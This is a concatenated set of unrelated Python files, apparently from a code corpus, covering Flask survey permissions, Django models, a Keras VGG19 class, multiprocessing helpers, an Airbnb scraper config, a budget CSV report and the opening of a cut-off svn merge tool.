rp = ReportPermission.query.filter_by(ReportId=report.id, UserId=user.id).first()
if rp is None and user.Role == 's':
return ADMIN_DEFAULT_PERMISSION
if rp is None:
return 'n'
return rp.Type
def set_report_permission(report: Report, user: User, permission: Permission, bylink=False):
"""Set permission of given user for report.
:param report: The report
:type report: Report
:param user: The user whose permissions are to be set
:type user: User
:param permission: The user's permissions for the report
:type permission: Permission
:param bylink: Is the permission set because of a link? (default: False)
:type belink: bool
"""
# If the permission is set because of a link, and the user is a guest
# then set it only temporarily, in their session.
if bylink and user.Role == 'g':
if 'reports' not in session:
session['reports'] = {}
if PERMISSION_ORDER.index(permission) >= PERMISSION_ORDER.index('r'):
session['reports'][report.id] = 'r'
return
rp = ReportPermission.query.filter_by(ReportId=report.id, UserId=user.id).first()
if rp is None:
rp = ReportPermission(ReportId=report.id, UserId=user.id)
db.session.add(rp)
if permission != "n":
rp.Type = permission
else:
db.session.delete(rp)
db.session.commit()
def create_report(user: User, survey: Survey, name: str, author: int) -> Report:
"""Create report for a given user
:param user: The creator of the report
:type user: User
:param survey: The source survey of the report
:type survey: Survey
:param name: The name of the new report
:type name: str
:param author: The database id of the creator
:type author: int
:return: The newly created report
:rtype: Report
"""
report = Report(Name=name, SurveyId=survey.id, AuthorId=author)
report.BackgroundImg = Survey.query.filter_by(id=survey.id).first().BackgroundImg
db.session.add(report)
db.session.commit()
set_report_permission(report, user, 'o')
return report
def delete_survey(survey: Survey):
"""Delete survey
:param survey: The survey to be deleted
:type survey: Survey
"""
# db_path = 'data/' + str(survey.id) + '.db'
# if os.path.exists(db_path):
# os.remove(db_path)
# xml_path = 'survey/' + str(survey.id) + '.xml'
# if os.path.exists(xml_path):
# os.remove(xml_path)
SurveyPermission.query.filter_by(SurveyId=survey.id).delete()
SurveyGroup.query.filter_by(SurveyId=survey.id).delete()
Survey.query.filter_by(id=survey.id).delete()
db.session.commit()
def delete_report(report: Report):
"""Delete report
:param report: The report to be deleted
:type report: Report
"""
ReportPermission.query.filter_by(ReportId=report.id).delete()
ReportGroup.query.filter_by(ReportId=report.id).delete()
Report.query.filter_by(id=report.id).delete()
db.session.commit()
def open_survey(survey: Survey) -> sqlite3.Connection:
"""Open an SQLite3 connection to the survey database
:param survey: The survey
:type survey: Survey
:return: A connection to the DB of the survey
:rtype: sqlite3.Connection
"""
return sqlite3.connect(f"data/{survey.id}.db")
def get_answers(survey_id: int) -> Dict:
"""Get answers for given survey
:param survey_id: Id of the survey
:type survey: Survey
:return: Answers in the survey
:rtype: Dict
"""
xml = ET.parse(os.path.join(ABSOLUTE_DIR_PATH, f"survey/{survey_id}.xml"))
result = {}
questions = ['single', 'multi', 'groupedsingle']
for q in questions:
for b in xml.getroot().iter(q):
header = b.find('header').text
header = re.sub('</?\w[^>]*>', '', header).strip(' \n')
if header not in result:
result[header]={}
result[header]["question"]=header
result[header]["type"]=q
result[header]["sub_questions"]=[]
result[header]["values"]={}
if 'defaultValue' in b.attrib:
result[header]["values"][b.attrib['defaultValue']]="default"
if q == 'groupedsingle':
for item in b.find('items'):
result[header]["sub_questions"].append(item.attrib['value'].strip(' '))
if q != "multi":
for item in b.find('answers'):
result[header]["values"][item.attrib['code']]=item.attrib['value'].strip(' ')
else:
for item in b.find('answers'):
result[header]["sub_questions"].append(item.attrib['value'].strip(' '))
result[header]["values"]["0"] = "NIE"
result[header]["values"]["1"] = "TAK"
return result
def get_dashboard() -> Dict:
"""Get dashboard for user
:return: Returns dictionary with surveys and reports
:rtype: Dict
"""
user = get_user()
user_surveys = get_user_surveys(user)
result = []
for survey in user_surveys:
author = get_user(survey.AuthorId)
result.append({
'type': 'survey',
'endsOn': survey.EndsOn.timestamp() if survey.EndsOn is not None else None,
'startedOn': survey.StartedOn.timestamp() if survey.StartedOn is not None else None,
'id': survey.id,
'name': survey.Name,
'sharedTo': get_survey_users(survey),
'ankieterId': survey.AnkieterId,
'isActive': survey.IsActive,
'questionCount': survey.QuestionCount,
'backgroundImg': survey.BackgroundImg,
'userId': user.id,
'answersCount': get_answers_count(survey),
'authorId': author.id,
'authorName':author.CasLogin
})
user_reports = get_user_reports(user)
for report in user_reports:
try:
survey = get_survey(report.SurveyId)
except:
continue
author = get_user(report.AuthorId)
result.append({
'type': 'report',
'id': report.id,
'name': report.Name,
'sharedTo': get_report_users(report),
'connectedSurvey': {"id": report.SurveyId, "name": survey.Name},
'backgroundImg': report.BackgroundImg,
'userId': user.id,
'authorId': author.id,
'authorName': author.CasLogin
})
return {"objects": result}
def get_types(conn: sqlite3.Connection) -> Dict[str, str]:
"""Get types for each column in the database.
:param conn: Connection to the database
:type conn: sqlite3.Connection
:return: A dictionary mapping names of columns to SQL names of their types
:rtype: Dict[str, str]
"""
types = {}
cur = conn.cursor()
cur.execute("PRAGMA table_info(data)")
data = cur.fetchall()
for row in data:
types[row[1]] = row[2]
return types
def get_columns(conn: sqlite3.Connection) -> List[str]:
"""Get column names in the order just like it is returned from the DB.
:param conn: Connection to the database
:type conn: sqlite3.Connection
:return: A list of column names in the database.
:rtype: Lis[str]
"""
columns = []
cur = conn.cursor()
cur.execute("PRAGMA table_info(data)")
data = cur.fetchall()
for row in data:
columns.append(row[1])
return columns
def get_answers_count(survey: Survey) -> int:
"""Get number of answers in the database for a given survey.
:param survey: The survey
:type survey: Survey
:return: The number of answers
:rtype: int
"""
conn = open_survey(survey)
cur = conn.cursor()
try:
cur.execute("SELECT * FROM data")
n = len(cur.fetchall())
except:
n = 0
conn.close()
return n
|
nilq/baby-python
|
python
|
import bitwise as bw
class TestStackPointer:
def test_StackPointer(self):
up = bw.wire.Wire()
down = bw.wire.Wire()
clock = bw.wire.Wire()
output_bus = bw.wire.Bus16()
a = bw.processor.StackPointer(up, down, clock, output_bus)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
down.value = 1
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
down.value = 0
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
up.value = 1
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
down.value = 1
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
print(a.__doc__)
print(a)
a(
up=0,
down=1,
clock=0,
output_bus=None
)
a(clock=1)
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
|
nilq/baby-python
|
python
|
from django.db import models
class Suggestion(models.Model):
name = models.CharField(max_length=100, unique=True)
class ImageTag(models.Model):
game = models.CharField(max_length=100)
image = models.CharField(max_length=50)
tag = models.CharField(max_length=200)
class Favorite(models.Model):
user = models.ForeignKey('authentication.CustomUser', on_delete=models.CASCADE)
slug = models.CharField(max_length=100)
class Meta:
unique_together = ('user', 'slug')
class Cover(models.Model):
game = models.CharField(max_length=100)
image = models.CharField(max_length=50)
tag = models.CharField(max_length=200)
size = models.IntegerField()
|
nilq/baby-python
|
python
|
"""
byceps.blueprints.site.core.views
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from __future__ import annotations
from typing import Optional
from flask import g, url_for
from .... import config
from ....services.party import service as party_service
from ....services.site import service as site_service
from ....util.framework.blueprint import create_blueprint
from ....util.user_session import get_current_user
blueprint = create_blueprint('core_site', __name__)
@blueprint.app_template_global()
def url_for_site_file(filename, **kwargs) -> Optional[str]:
"""Render URL for a static file local to the current site."""
site_id = getattr(g, 'site_id', None)
if site_id is None:
return None
return url_for('site_file', site_id=site_id, filename=filename, **kwargs)
@blueprint.before_app_request
def prepare_request_globals() -> None:
site_id = config.get_current_site_id()
site = site_service.get_site(site_id)
g.site_id = site.id
g.brand_id = site.brand_id
party_id = site.party_id
if party_id is not None:
g.party = party_service.get_party(party_id)
party_id = g.party.id
g.party_id = party_id
required_permissions: set[str] = set()
g.user = get_current_user(required_permissions)
|
nilq/baby-python
|
python
|
from .qtscraper import *
from ._version import __version__
def setup(app):
from .qtgallery import setup
return setup(app)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional help about contributing code to gsutil."""
from __future__ import absolute_import
from gslib.help_provider import HelpProvider
_DETAILED_HELP_TEXT = ("""
<B>OVERVIEW</B>
We're open to incorporating gsutil code changes authored by users. Here
are some guidelines:
1. Before we can accept code submissions, we have to jump a couple of legal
hurdles. Please fill out either the individual or corporate Contributor
License Agreement:
- If you are an individual writing original source code and you're
sure you own the intellectual property,
then you'll need to sign an individual CLA
(https://cla.developers.google.com/about/google-individual).
- If you work for a company that wants to allow you to contribute your
work to gsutil, then you'll need to sign a corporate CLA
(https://cla.developers.google.com/about/google-corporate)
Follow either of the two links above to access the appropriate CLA and
instructions for how to sign and return it. Once we receive it, we'll
add you to the official list of contributors and be able to accept
your patches.
2. If you found a bug or have an idea for a feature enhancement, we suggest
you check https://github.com/GoogleCloudPlatform/gsutil/issues to see if it
has already been reported by another user. From there you can also
subscribe to updates to the issue by clicking the "Watch thread" button at
the bottom of the page.
3. It's usually worthwhile to send email to gs-team@google.com about your
idea before sending actual code. Often we can discuss the idea and help
propose things that could save you later revision work.
4. We tend to avoid adding command line options that are of use to only
a very small fraction of users, especially if there's some other way
to accommodate such needs. Adding such options complicates the code and
also adds overhead to users having to read through an "alphabet soup"
list of option documentation.
5. While gsutil has a number of features specific to Google Cloud Storage,
it can also be used with other cloud storage providers. We're open to
including changes for making gsutil support features specific to other
providers, as long as those changes don't make gsutil work worse for Google
Cloud Storage. If you do make such changes we recommend including someone
with knowledge of the specific provider as a code reviewer (see below).
6. You can check out the gsutil code from the GitHub repository:
https://github.com/GoogleCloudPlatform/gsutil
To clone a read-only copy of the repository:
git clone git://github.com/GoogleCloudPlatform/gsutil.git
git submodule update --init --recursive
To push your own changes to GitHub, click the Fork button on the
repository page and clone the repository from your own fork.
7. The gsutil git repository uses git submodules to pull in external modules.
After checking out the repository, make sure to also pull the submodules
by entering into the gsutil top-level directory and run:
git submodule update --init --recursive
8. Please make sure to run all tests against your modified code. To
do this, change directories into the gsutil top-level directory and run:
./gsutil test
The above tests take a long time to run because they send many requests to
the production service. The gsutil test command has a -u argument that will
only run unit tests. These run quickly, as they are executed with an
in-memory mock storage service implementation. To run only the unit tests,
run:
./gsutil test -u
If you made changes to boto, please run the boto tests. For these tests you
need to use HMAC credentials (from gsutil config -a), because the current
boto test suite doesn't import the OAuth2 handler. You'll also need to
install some python modules. Change directories into the boto root
directory at third_party/boto and run:
pip install -r requirements.txt
(You probably need to run this command using sudo.)
Make sure each of the individual installations succeeded. If they don't
you may need to run the install command again.
Then ensure your .boto file has HMAC credentials defined (the boto tests
don't load the OAUTH2 plugin), and then change directories into boto's
tests directory and run:
python test.py unit
python test.py -t s3 -t gs -t ssl
9. Please consider contributing test code for your change, especially if the
change impacts any of the core gsutil code (like the gsutil cp command).
10. When it's time to send us code, please use the Rietveld code review tool
rather than simply sending us a code patch. Do this as follows:
- Check out the gsutil code from your fork of the gsutil repository and
apply your changes.
- Download the "upload.py" script from
https://github.com/rietveld-codereview/rietveld
- Run upload.py from your git directory with the changes.
- Click the codereview.appspot.com link it generates, click "Edit Issue",
and add mfschwartz@google.com as a reviewer, and Cc gs-team@google.com.
- Click Publish+Mail Comments.
- Once your changes are accepted, submit a pull request on GitHub and we
will merge your commits.
""")
class CommandOptions(HelpProvider):
"""Additional help about contributing code to gsutil."""
# TODO: gsutil-beta: Add lint .rc file and linting instructions.
# Help specification. See help_provider.py for documentation.
help_spec = HelpProvider.HelpSpec(
help_name='dev',
help_name_aliases=[
'development', 'developer', 'code', 'mods', 'software'],
help_type='additional_help',
help_one_line_summary='Contributing Code to gsutil',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
|
nilq/baby-python
|
python
|
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout
from keras.layers.convolutional import Conv2D, MaxPooling2D
class VGG19(Sequential):
def __init__(self):
super().__init__()
self.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(224, 224, 3), padding='same', activation='relu'))
self.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(MaxPooling2D(pool_size=(2, 2)))
self.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(MaxPooling2D(pool_size=(2, 2)))
self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(MaxPooling2D(pool_size=(2, 2), name="VGG19_Pool3"))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(MaxPooling2D(pool_size=(2, 2)))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Flatten())
self.add(Dense(4096, activation='relu'))
self.add(Dropout(0.5))
self.add(Dense(4096, activation='relu'))
self.add(Dropout(0.5))
self.add(Dense(1000, activation='softmax'))
self.compile(loss='categorical_crossentropy', optimizer='SGD', metrics=['accuracy'])
self.summary()
|
nilq/baby-python
|
python
|
import sys
import time
import numpy as np
import pandas as pd
import datetime as dt
import multiprocessing as mp
class MultiProcessingFunctions:
""" This static functions in this class enable multi-processing"""
def __init__(self):
pass
@staticmethod
def lin_parts(num_atoms, num_threads):
""" This function partitions a list of atoms in subsets (molecules) of equal size.
An atom is a set of indivisible set of tasks.
Reference: Snippet 20.6 (page 308)
"""
# partition of atoms with a single loop
parts = np.linspace(0, num_atoms, min(num_threads, num_atoms) + 1)
parts = np.ceil(parts).astype(int)
return parts
@staticmethod
def nested_parts(num_atoms, num_threads, upper_triangle=False):
""" This function enables parallelization of nested loops.
Reference: Snippet 20.5 (page 306)
"""
# partition of atoms with an inner loop
parts = []
num_threads_ = min(num_threads, num_atoms)
for num in range(num_threads_):
part = 1 + 4 * (parts[-1] ** 2 + parts[-1] + num_atoms * (num_atoms + 1.) / num_threads_)
part = (-1 + part ** .5) / 2.
parts.append(part)
parts = np.round(parts).astype(int)
if upper_triangle: # the first rows are heaviest
parts = np.cumsum(np.diff(parts)[::-1])
parts = np.append(np.array([0]), parts)
return parts
@staticmethod
def mp_pandas_obj(func, pd_obj, num_threads=24, mp_batches=1, lin_mols=True, **kargs):
""" Parallelize jobs, return a dataframe or series
Example: df1=mp_pandas_obj(func,('molecule',df0.index),24,**kwds)
Reference: Snippet 20.7 (page 310)
:param func: (string) function to be parallelized
:param pd_obj: (vector) Element 0, is name of argument used to pass the molecule;
Element 1, is the list of atoms to be grouped into a molecule
:param num_threads: (int) number of threads
:param mp_batches: (int) number of batches
:param lin_mols: (bool) Tells if the method should use linear or nested partitioning
:param kargs: (var args)
:return: (data frame) of results
"""
if lin_mols:
parts = MultiProcessingFunctions.lin_parts(len(pd_obj[1]), num_threads * mp_batches)
else:
parts = MultiProcessingFunctions.nested_parts(len(pd_obj[1]), num_threads * mp_batches)
jobs = []
for i in range(1, len(parts)):
job = {pd_obj[0]: pd_obj[1][parts[i - 1]:parts[i]], 'func': func}
job.update(kargs)
jobs.append(job)
if num_threads == 1:
out = MultiProcessingFunctions.process_jobs_(jobs)
else:
out = MultiProcessingFunctions.process_jobs(jobs, num_threads=num_threads)
if isinstance(out[0], pd.DataFrame):
df0 = pd.DataFrame()
elif isinstance(out[0], pd.Series):
df0 = pd.Series()
else:
return out
for i in out:
df0 = df0.append(i)
df0 = df0.sort_index()
return df0
@staticmethod
def process_jobs_(jobs):
""" Run jobs sequentially, for debugging """
out = []
for job in jobs:
out_ = MultiProcessingFunctions.expand_call(job)
out.append(out_)
return out
@staticmethod
def expand_call(kargs):
""" Expand the arguments of a callback function, kargs['func'] """
func = kargs['func']
del kargs['func']
out = func(**kargs)
return out
@staticmethod
def report_progress(job_num, num_jobs, time0, task):
# Report progress as asynch jobs are completed
msg = [float(job_num) / num_jobs, (time.time() - time0)/60.]
msg.append(msg[1] * (1/msg[0] - 1))
time_stamp = str(dt.datetime.fromtimestamp(time.time()))
msg = time_stamp + ' ' + str(round(msg[0]*100, 2)) + '% '+task+' done after ' + \
str(round(msg[1], 2)) + ' minutes. Remaining ' + str(round(msg[2], 2)) + ' minutes.'
if job_num < num_jobs:
sys.stderr.write(msg+'\r')
else:
sys.stderr.write(msg+'\n')
return
@staticmethod
def process_jobs(jobs, task=None, num_threads=24):
""" Run in parallel. jobs must contain a 'func' callback, for expand_call"""
if task is None:
task = jobs[0]['func'].__name__
pool = mp.Pool(processes=num_threads)
# outputs, out, time0 = pool.imap_unordered(MultiProcessingFunctions.expand_call,jobs),[],time.time()
outputs = pool.imap_unordered(MultiProcessingFunctions.expand_call, jobs)
out = []
time0 = time.time()
# Process asyn output, report progress
for i, out_ in enumerate(outputs, 1):
out.append(out_)
MultiProcessingFunctions.report_progress(i, len(jobs), time0, task)
pool.close()
pool.join() # this is needed to prevent memory leaks
return out
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
# ============================================================================
# Airbnb Configuration module, for use in web scraping and analytics
# ============================================================================
import logging
import os
import configparser
import sys
from bnb_kanpora.models import RoomModel, SurveyModel, SearchAreaModel, SurveyProgressModel
from playhouse.sqlite_ext import SqliteExtDatabase
MODELS = [RoomModel, SurveyModel, SearchAreaModel, SurveyProgressModel]
logger = logging.getLogger()
class Config():
def __init__(self, config_file=None, verbose=False):
""" Read the configuration file <username>.config to set up the run
"""
self.config_file = config_file
self.log_level = logging.DEBUG if verbose else logging.INFO
self.URL_ROOT = "https://www.airbnb.com/"
self.URL_ROOM_ROOT = self.URL_ROOT + "rooms/"
self.URL_HOST_ROOT = self.URL_ROOT + "users/show/"
self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
self.SEARCH_LISTINGS_ON_FULL_PAGE = 18
self.HTTP_PROXY_LIST = []
self.GOOGLE_API_KEY = None
self.AWS_KEY = None
self.AWS_SECRET = None
self.USE_ROTATING_IP = False
try:
config = configparser.ConfigParser()
if self.config_file is None:
# look for username.config on both Windows (USERNAME) and Linux (USER)
self.config_file = "app.config"
if not os.path.isfile(self.config_file):
logging.error("Configuration file %s not found.", self.config_file)
sys.exit()
config.read(self.config_file)
# database
try:
self.database = SqliteExtDatabase(f'{config["DATABASE"]["db_name"]}.db', pragmas=(
('cache_size', -1024 * 64), # 64MB page-cache.
('journal_mode', 'wal'), # Use WAL-mode (you should always use this!).
('foreign_keys', 1)) # Enforce foreign-key constraints.
)
self.database.bind(MODELS)
self.database.connect()
self.database.create_tables(MODELS)
except Exception:
logger.error("Incomplete database information in %s: cannot continue",
self.config_file)
sys.exit()
# network
try:
self.HTTP_PROXY_LIST = config["NETWORK"]["proxy_list"].split(",")
self.HTTP_PROXY_LIST = [x.strip() for x in self.HTTP_PROXY_LIST]
# Remove any empty strings from the list of proxies
self.HTTP_PROXY_LIST = [x for x in self.HTTP_PROXY_LIST if x]
except Exception:
logger.warningf("No proxy_list in {self.config_file}: not using proxies")
self.HTTP_PROXY_LIST = []
try:
self.USER_AGENT_LIST = config["NETWORK"]["user_agent_list"].split(",,")
self.USER_AGENT_LIST = [x.strip() for x in self.USER_AGENT_LIST]
self.USER_AGENT_LIST = [x.strip('"') for x in self.USER_AGENT_LIST]
except Exception:
logger.info(f"No user agent list in {config_file}: not using user-agents")
self.USER_AGENT_LIST = []
self.MAX_CONNECTION_ATTEMPTS = int(config["NETWORK"]["max_connection_attempts"])
self.REQUEST_SLEEP = float(config["NETWORK"]["request_sleep"])
self.HTTP_TIMEOUT = float(config["NETWORK"]["http_timeout"])
try:
self.URL_API_SEARCH_ROOT = config["NETWORK"]["url_api_search_root"]
except:
logger.warning("Missing config file entry: url_api_search_root.")
logger.warning("For more information, see example.config")
self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
try:
self.API_KEY = config["NETWORK"]["api_key"]
except:
logger.warning("Missing config file entry: api_key.")
logger.warning("For more information, see example.config")
self.API_KEY = None
if self.API_KEY is None or self.API_KEY=="":
self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
try:
self.CLIENT_SESSION_ID = config["NETWORK"]["client_session_id"]
except:
logger.warning("Missing config file entry: client_session_id.")
logger.warning("For more information, see example.config")
self.CLIENT_SESSION_ID = None
# survey
self.SEARCH_MAX_PAGES = int(config["SURVEY"]["search_max_pages"])
self.SEARCH_MAX_GUESTS = int(config["SURVEY"]["search_max_guests"])
self.RE_INIT_SLEEP_TIME = float(config["SURVEY"]["re_init_sleep_time"])
# account
try:
self.GOOGLE_API_KEY = config["ACCOUNT"]["google_api_key"]
except:
logger.warning("Missing config file entry: Google API Key. Needed only for geocoding")
logger.warning("For more information, see example.config")
try:
self.AWS_KEY = config["ACCOUNT"]["aws_key"]
self.AWS_SECRET = config["ACCOUNT"]["aws_secret"]
except:
logger.warning(
"Missing config file entry: AWS API Key. Needed only for proxies")
logger.warning("For more information, see example.config")
except Exception:
logger.exception("Failed to read config file properly")
raise
|
nilq/baby-python
|
python
|
import _hgdb
class DebugSymbolTableException(Exception):
def __init__(self, what):
super().__init__(what)
# wrapper class
class DebugSymbolTable:
def __init__(self, filename):
self.db = _hgdb.init_debug_db(filename)
def store_variable(self, id_: int, value: str, is_rtl: bool = True):
_hgdb.store_variable(self.db, id_, value, is_rtl)
def store_breakpoint(self, id_: int, instance_id: int, filename: str, line_num: int, column_num: int = 0,
condition: str = "", trigger: str = ""):
# check instance id
if not self.has_instance_id(instance_id):
raise DebugSymbolTableException(f"Instance {instance_id} does not exist!")
_hgdb.store_breakpoint(self.db, id_, instance_id, filename, line_num, column_num, condition, trigger)
def store_instance(self, id_: int, full_name: str, annotation: str = ""):
_hgdb.store_instance(self.db, id_, full_name, annotation)
def store_scope(self, id_: int, *args: int):
for breakpoint_id in args:
if not self.has_breakpoint_id(breakpoint_id):
raise DebugSymbolTableException(f"Breakpoint {breakpoint_id} does not exist!")
_hgdb.store_scope(self.db, id_, *args)
def store_context_variable(self, name: str, breakpoint_id: int, variable_id: int):
if not self.has_breakpoint_id(breakpoint_id):
raise DebugSymbolTableException(f"Breakpoint {breakpoint_id} does not exist!")
if not self.has_variable_id(variable_id):
raise DebugSymbolTableException(f"Variable {variable_id} does not exist!")
_hgdb.store_context_variable(self.db, name, breakpoint_id, variable_id)
def store_generator_variable(self, name: str, instance_id: int, variable_id: int, annotation: str = ""):
if not self.has_instance_id(instance_id):
raise DebugSymbolTableException(f"Instance {instance_id} does not exist!")
if not self.has_variable_id(variable_id):
raise DebugSymbolTableException(f"Variable {variable_id} does not exist!")
_hgdb.store_generator_variable(self.db, name, instance_id, variable_id, annotation)
# checkers
def has_instance_id(self, id_):
return _hgdb.has_instance_id(self.db, id_)
def has_breakpoint_id(self, id_):
return _hgdb.has_breakpoint_id(self.db, id_)
def has_variable_id(self, id_):
return _hgdb.has_variable_id(self.db, id_)
# get other information
def get_filenames(self):
return _hgdb.get_filenames(self.db)
# transaction based insertion
def begin_transaction(self):
return _hgdb.begin_transaction(self.db)
def end_transaction(self):
return _hgdb.end_transaction(self.db)
|
nilq/baby-python
|
python
|
#This program takes a csv file of financial data as input and produces
#a statistical report stored to a csv file and printed to the terminal.
#The input file must contain a series of months with corresponding profits
#and losses. The output report includes the total number of months analyzed,
#the net total amount of "Profit/Losses" over the entire period, the average
#of the changes in "Profit/Losses" over the entire period, and the greatest
#increase and greatest decrease in profits (date and amount) over the entire
#period.
import csv
import os
month_list = []
month_count = 0
net_profit = 0
greatest_profit = 0
greatest_loss = 0
#Store relative path of csv
csvpath = "Resources/budget_data.csv"
#Open csv file, skipping over header row
with open(csvpath) as data_file:
next(data_file)
data_rows = csv.reader(data_file, delimiter = ',')
#Loop through csv
for row in data_rows:
#Count months by accummulating them into a list (ommit any duplicates)
if row[0] not in month_list:
month_list.append(row[0])
month_count += 1
#Accummulate net profit
net_profit = net_profit + int(row[1])
#As greater profits are found, replace current greatest
if int(row[1]) > greatest_profit:
greatest_profit = int(row[1])
greatest_profit_info = [row[0], row[1]]
#As greater losses are found, replace current greatest
elif int(row[1]) < greatest_loss:
greatest_loss = int(row[1])
greatest_loss_info = [row[0], row[1]]
#Organize results into formatted report
report = f"Total months: {str(month_count)}"\
f"\nNet profit: {str(net_profit)}"\
f"\nAverage change: {round(net_profit / month_count, 2)}"\
f"\nGreatest increase in profit: {greatest_profit_info[1]} on {greatest_profit_info[0]}"\
f"\nGreatest decrease inprofit: {greatest_loss_info[1]} on {greatest_loss_info[0]}"
#Print report to terminal and new csv file
print(report)
output_directory = "Analysis"
os.chdir(output_directory)
with open('banking_results.csv', 'w', newline='') as output_file:
output_file.write(report)
|
nilq/baby-python
|
python
|
import numpy as np
import tensorflow as tf
import time
# Load TFLite model and allocate tensors.
interpreter = tf.lite.Interpreter(model_path="output/model.tflite")
interpreter.allocate_tensors()
# Get input and output tensors.
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
# Test model FPS on random input data.
input_shape = input_details[0]['shape']
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)
start = time.time()
for idx in range(10):
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
# The function `get_tensor()` returns a copy of the tensor data.
# Use `tensor()` in order to get a pointer to the tensor.
output_data = interpreter.get_tensor(output_details[0]['index'])
print(output_data.shape)
end = time.time()
print(end-start)
# cap = cv2.VideoCapture('/home/anurag/lightspeed/data/pushup-random.mp4')
# while(cap.isOpened()):
# ret, frame = cap.read()
# resized = cv2.resize(frame, (192, 192) , interpolation = cv2.INTER_LINEAR)
# cv2.imshow('frame', resized)
# interpreter.set_tensor(input_details[0]['index'], resized)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
# cap.release()
# cv2.destroyAllWindows()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python2
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import optparse
import os
import re
import sys
import urlparse
import gclient_utils
import subprocess2
USAGE = """
WARNING: Please use this tool in an empty directory
(or at least one that you don't mind clobbering.)
REQUIRES: SVN 1.5+
NOTE: NO NEED TO CHECKOUT ANYTHING IN ADVANCE OF USING THIS TOOL.
Valid parameters:
[Merge from trunk to branch]
--merge <revision> --branch <branch_num>
Example: %(app)s --merge 12345 --branch 187
[Merge from trunk to local copy]
--merge <revision> --local
Example: %(app)s --merge 12345 --local
[Merge from branch to branch]
--merge <revision> --sbranch <branch_num> --branch <branch_num>
Example: %(app)s --merge 12345 --sbranch 248 --branch 249
[Revert from trunk]
--revert <revision>
Example: %(app)s --revert 12345
[Revert from branch]
--revert <revision> --branch <branch_num>
Example: %(app)s --revert 12345 --branch 187
"""
export_map_ = None
files_info_ = None
delete_map_ = None
file_pattern_ = r"[ ]+([MADUC])[ ]+/((?:trunk|branches/.*?)/src(.*)/(.*))"
depot_tools_dir_ = os.path.dirname(os.path.abspath(__file__))
def runGcl(subcommand):
gcl_path = os.path.join(depot_tools_dir_, "gcl")
if not os.path.exists(gcl_path):
print "WARNING: gcl not found beside drover.py. Using system gcl instead..."
gcl_path = 'gcl'
command = "%s %s" % (gcl_path, subcommand)
return os.system(command)
def gclUpload(revision, author):
